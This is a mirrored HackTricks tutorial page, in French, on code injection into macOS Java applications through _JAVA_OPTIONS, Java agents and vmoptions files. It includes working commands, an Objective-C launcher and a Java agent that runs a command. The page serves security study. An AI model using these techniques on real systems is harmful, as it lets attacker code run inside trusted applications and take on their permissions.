mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
183 lines
8.3 KiB
Markdown
183 lines
8.3 KiB
Markdown
# Injection dans les applications Java macOS
|
|
|
|
<details>
|
|
|
|
<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Autres moyens de soutenir HackTricks :
|
|
|
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## Énumération
|
|
|
|
Trouvez les applications Java installées sur votre système. Il a été remarqué que les applications Java dans le **Info.plist** contiendront certains paramètres java qui contiennent la chaîne **`java.`**, vous pouvez donc rechercher cela :
|
|
```bash
|
|
# Search only in /Applications folder
|
|
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
|
|
|
|
# Full search
|
|
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
|
|
```
|
|
## \_JAVA\_OPTIONS
|
|
|
|
La variable d'environnement **`_JAVA_OPTIONS`** peut être utilisée pour injecter des paramètres Java arbitraires dans l'exécution d'une application compilée Java :
|
|
```bash
|
|
# Write your payload in a script called /tmp/payload.sh
|
|
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
|
|
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
|
```
|
|
Pour l'exécuter en tant que nouveau processus et non en tant qu'enfant du terminal actuel, vous pouvez utiliser :
|
|
```objectivec
|
|
#import <Foundation/Foundation.h>
|
|
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
|
|
|
|
int main(int argc, const char * argv[]) {
|
|
@autoreleasepool {
|
|
// Specify the file path and content
|
|
NSString *filePath = @"/tmp/payload.sh";
|
|
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
|
|
|
|
NSError *error = nil;
|
|
|
|
// Write content to the file
|
|
BOOL success = [content writeToFile:filePath
|
|
atomically:YES
|
|
encoding:NSUTF8StringEncoding
|
|
error:&error];
|
|
|
|
if (!success) {
|
|
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
|
|
return 1;
|
|
}
|
|
|
|
NSLog(@"File written successfully to %@", filePath);
|
|
|
|
// Create a new task
|
|
NSTask *task = [[NSTask alloc] init];
|
|
|
|
/// Set the task's launch path to use the 'open' command
|
|
[task setLaunchPath:@"/usr/bin/open"];
|
|
|
|
// Arguments for the 'open' command, specifying the path to Android Studio
|
|
[task setArguments:@[@"/Applications/Android Studio.app"]];
|
|
|
|
// Define custom environment variables
|
|
NSDictionary *customEnvironment = @{
|
|
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
|
|
};
|
|
|
|
// Get the current environment and merge it with custom variables
|
|
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
|
|
[environment addEntriesFromDictionary:customEnvironment];
|
|
|
|
// Set the task's environment
|
|
[task setEnvironment:environment];
|
|
|
|
// Launch the task
|
|
[task launch];
|
|
}
|
|
return 0;
|
|
}
|
|
```
|
|
Cependant, cela déclenchera une erreur sur l'application exécutée, une autre manière plus discrète est de créer un agent java et d'utiliser :
|
|
```bash
|
|
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
|
|
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
|
|
|
# Or
|
|
|
|
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
|
|
```
|
|
{% hint style="danger" %}
|
|
Créer l'agent avec une **version Java différente** de celle de l'application peut entraîner le crash de l'exécution de l'agent et de l'application.
|
|
{% endhint %}
|
|
|
|
L'agent peut être :
|
|
|
|
{% code title="Agent.java" %}
|
|
```java
|
|
import java.io.*;
|
|
import java.lang.instrument.*;
|
|
|
|
public class Agent {
|
|
public static void premain(String args, Instrumentation inst) {
|
|
try {
|
|
String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
|
|
Runtime.getRuntime().exec(commands);
|
|
}
|
|
catch (Exception err) {
|
|
err.printStackTrace();
|
|
}
|
|
}
|
|
}
|
|
```
|
|
Pour compiler l'agent, exécutez :
|
|
```bash
|
|
javac Agent.java # Create Agent.class
|
|
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
|
|
```
|
|
Avec `manifest.txt` :
|
|
```
|
|
Premain-Class: Agent
|
|
Agent-Class: Agent
|
|
Can-Redefine-Classes: true
|
|
Can-Retransform-Classes: true
|
|
```
|
|
```markdown
|
|
Et ensuite, exportez la variable d'environnement et exécutez l'application java comme suit :
|
|
```
|
|
```bash
|
|
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
|
|
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
|
|
|
# Or
|
|
|
|
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
|
|
```
|
|
## fichier vmoptions
|
|
|
|
Ce fichier prend en charge la spécification des **paramètres Java** lors de l'exécution de Java. Vous pourriez utiliser certaines des astuces précédentes pour modifier les paramètres java et **faire exécuter des commandes arbitraires au processus**.\
|
|
De plus, ce fichier peut également **inclure d'autres** fichiers avec le répertoire `include`, donc vous pourriez aussi modifier un fichier inclus.
|
|
|
|
Encore plus, certaines applications Java chargeront **plus d'un fichier `vmoptions`**.
|
|
|
|
Certaines applications comme Android Studio indiquent dans leur **sortie où elles recherchent** ces fichiers, comme :
|
|
```bash
|
|
/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
|
|
|
|
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
|
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
|
2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
|
2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
|
|
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
|
|
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
|
|
```
|
|
S'ils ne le font pas, vous pouvez facilement vérifier avec :
|
|
```bash
|
|
# Monitor
|
|
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
|
|
|
|
# Launch the Java app
|
|
/Applications/Android\ Studio.app/Contents/MacOS/studio
|
|
```
|
|
Remarquez à quel point il est intéressant de voir qu'Android Studio dans cet exemple essaie de charger le fichier **`/Applications/Android Studio.app.vmoptions`**, un emplacement où tout utilisateur du groupe **`admin`** a un accès en écriture.
|
|
|
|
<details>
|
|
|
|
<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Autres moyens de soutenir HackTricks :
|
|
|
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|